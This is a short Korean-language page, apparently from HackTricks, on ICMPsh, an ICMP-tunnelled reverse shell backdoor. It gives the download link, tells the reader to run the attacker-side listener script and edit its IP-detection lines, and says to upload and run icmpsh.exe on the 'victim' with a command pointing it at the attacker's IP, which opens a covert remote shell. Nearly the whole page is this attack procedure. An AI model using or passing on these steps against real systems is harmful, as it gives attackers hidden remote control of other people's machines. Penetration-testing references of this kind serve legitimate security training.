ICMPsh

HackTricks 지원하기

백도어를 다운로드하세요: https://github.com/inquisb/icmpsh

클라이언트 측

스크립트를 실행하세요: run.sh

에러가 발생하면 다음 라인을 변경해보세요:

IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')

대상:

echo Please insert the IP where you want to listen
read IP

피해자 측

icmpsh.exe를 피해자에게 업로드하고 실행하십시오:

icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
HackTricks 지원

Last updated